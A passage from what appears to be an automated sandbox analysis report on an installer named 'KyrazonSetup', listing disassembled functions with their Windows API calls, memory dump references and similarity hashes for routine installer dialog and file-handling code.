                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404B3A
                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404C93
                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404E63
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404E73
                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405012
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                                                                                      • ShowWindow.USER32(00000000), ref: 00405024
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 0ec6e848b4d64707c0c534aaaf3abb65ca3a131ed20d6c62d8bc71840dc3714d
                                                                                      • Instruction ID: ae1b00e1ce1277df7b1735320a59ff19d2ce0b10c9e2d438dce5626e8e49cf71
                                                                                      • Opcode Fuzzy Hash: 0ec6e848b4d64707c0c534aaaf3abb65ca3a131ed20d6c62d8bc71840dc3714d
                                                                                      • Instruction Fuzzy Hash: A4028CB0900209EFEB149FA4DD85AAE7BB5FB85315F10813AF610BA2E1C7789D41CF58
                                                                                      Function 004044D1 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404520
                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                                                                                      • SHBrowseForFolderA.SHELL32(?,00436048,?), ref: 004045FB
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404606
                                                                                      • lstrcmpiA.KERNEL32(Remove folder: ,0043C070), ref: 00404638
                                                                                      • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404644
                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                                                                        • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00002000,0040468D), ref: 004056B3
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                                                        • Part of subcall function 0040620A: CharPrevA.USER32(?,?,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                                                      • GetDiskFreeSpaceA.KERNEL32(00434040,?,?,0000040F,?,00434040,00434040,?,00000001,00434040,?,?,000003FB,?), ref: 00404714
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                                                                        • Part of subcall function 00404888: lstrlenA.KERNEL32(0043C070,0043C070,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                                                        • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                                                                        • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0043C070), ref: 00404941
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: @@C$A$Remove folder:
                                                                                      • API String ID: 2624150263-2183615021
                                                                                      • Opcode ID: 7ef8a4e814c27e81c47c060a94f59a0edf6edbf9bfac78d51444d93d037a2c18
                                                                                      • Instruction ID: e8720552b39bc5e1a1e5bc62f042add849ee966c36376373cb0498c2a1bd2d83
                                                                                      • Opcode Fuzzy Hash: 7ef8a4e814c27e81c47c060a94f59a0edf6edbf9bfac78d51444d93d037a2c18
                                                                                      • Instruction Fuzzy Hash: EAA17FB1900209ABDB11AFA5CD41AAF77B8EF85714F10843BF601B62D1DB7C89418B6D
                                                                                      Function 004020D1 Relevance: 3.1, APIs: 2, Instructions: 139comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 123533781-0
                                                                                      • Opcode ID: c06e033e1e2c95d1fe580b90fda3cbfe14670beca3e660ca2b57938a98181c45
                                                                                      • Instruction ID: 38f9ea58667bbeefe91ea46def2d4473f2bb8d40fc5798594265f0c7871110e2
                                                                                      • Opcode Fuzzy Hash: c06e033e1e2c95d1fe580b90fda3cbfe14670beca3e660ca2b57938a98181c45
                                                                                      • Instruction Fuzzy Hash: 97511671A00208BFCB10DFE4C989A9D7BB6BF49318F2085AAF515EB2D1DA799941CF14
                                                                                      Function 004026FE Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040270D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 30279c0e50a8690cce3ffb9d7c79d757c173bf2cb79eb9bac223a122c5b329d7
                                                                                      • Instruction ID: 5aed6d40d86b88915634d7fec2bcc4b02db16a4bc7a6b1cfd12d68146168d207
                                                                                      • Opcode Fuzzy Hash: 30279c0e50a8690cce3ffb9d7c79d757c173bf2cb79eb9bac223a122c5b329d7
                                                                                      • Instruction Fuzzy Hash: 42F0A772604151ABD700E7A499499EEB76CDF11324F60057BE181F20C1CABC8A459B3A
                                                                                      Function 0040677D Relevance: .3, Instructions: 334COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                                                                      • Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
                                                                                      • Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
                                                                                      • Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54
                                                                                      Function 00406F54 Relevance: .3, Instructions: 300COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1b132db68e09e38111b46a630986fe986278179b426aaa6f424b6530bbbb36a0
                                                                                      • Instruction ID: ff0fd36e996cd89d8e6760587b242a798bd2a834485e3e6d32977043394459b2
                                                                                      • Opcode Fuzzy Hash: 1b132db68e09e38111b46a630986fe986278179b426aaa6f424b6530bbbb36a0
                                                                                      • Instruction Fuzzy Hash: 76C15931E042599BCF14CF68D4905EEB7B2FF89314F25826AD8567B380D738A942CF95
                                                                                      Function 004041AA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 202windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                                                                                      • GetSysColor.USER32(?), ref: 00404278
                                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                                                                                      • lstrlenA.KERNEL32(?), ref: 00404299
                                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                                                                                      • SendMessageA.USER32(00000000), ref: 00404322
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                                                                                      • SetCursor.USER32(00000000), ref: 004043A5
                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                                                                                      • SetCursor.USER32(00000000), ref: 004043BE
                                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: N$Remove folder: $uA@
                                                                                      • API String ID: 3103080414-4189957094
                                                                                      • Opcode ID: d4eefe654d22cd8461d298cd50b25cc69fd42f6e548781b2386fab9e0069321a
                                                                                      • Instruction ID: 189a73e33a32ab5629d9b6d5aa7b8342c7ad0906f2d845131673515c77320290
                                                                                      • Opcode Fuzzy Hash: d4eefe654d22cd8461d298cd50b25cc69fd42f6e548781b2386fab9e0069321a
                                                                                      • Instruction Fuzzy Hash: 3D61A3B1A40209BFEB109F61CD45F6A7B69EB84705F10803AFB05BA1D1C7B8A951CF68
                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextA.USER32(00000000,0044E400,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 9a87abe2a4d34ea04cac22e8b23e016ca7fa537fe8c057691b6d5ac7f024c321
                                                                                      • Instruction ID: 0f017803aeec3de1db0009a5ab91645596a598df957f8b8ef67319ce70b6f2d5
                                                                                      • Opcode Fuzzy Hash: 9a87abe2a4d34ea04cac22e8b23e016ca7fa537fe8c057691b6d5ac7f024c321
                                                                                      • Instruction Fuzzy Hash: 74418C71800209AFCF058F95CE459AFBBB9FF45315F00842EF5A1AA1A0C774D955DFA4
                                                                                      Function 00405C0F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                                                                                      • GetShortPathNameA.KERNEL32(?,00448600,00000400), ref: 00405C49
                                                                                        • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                                                        • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
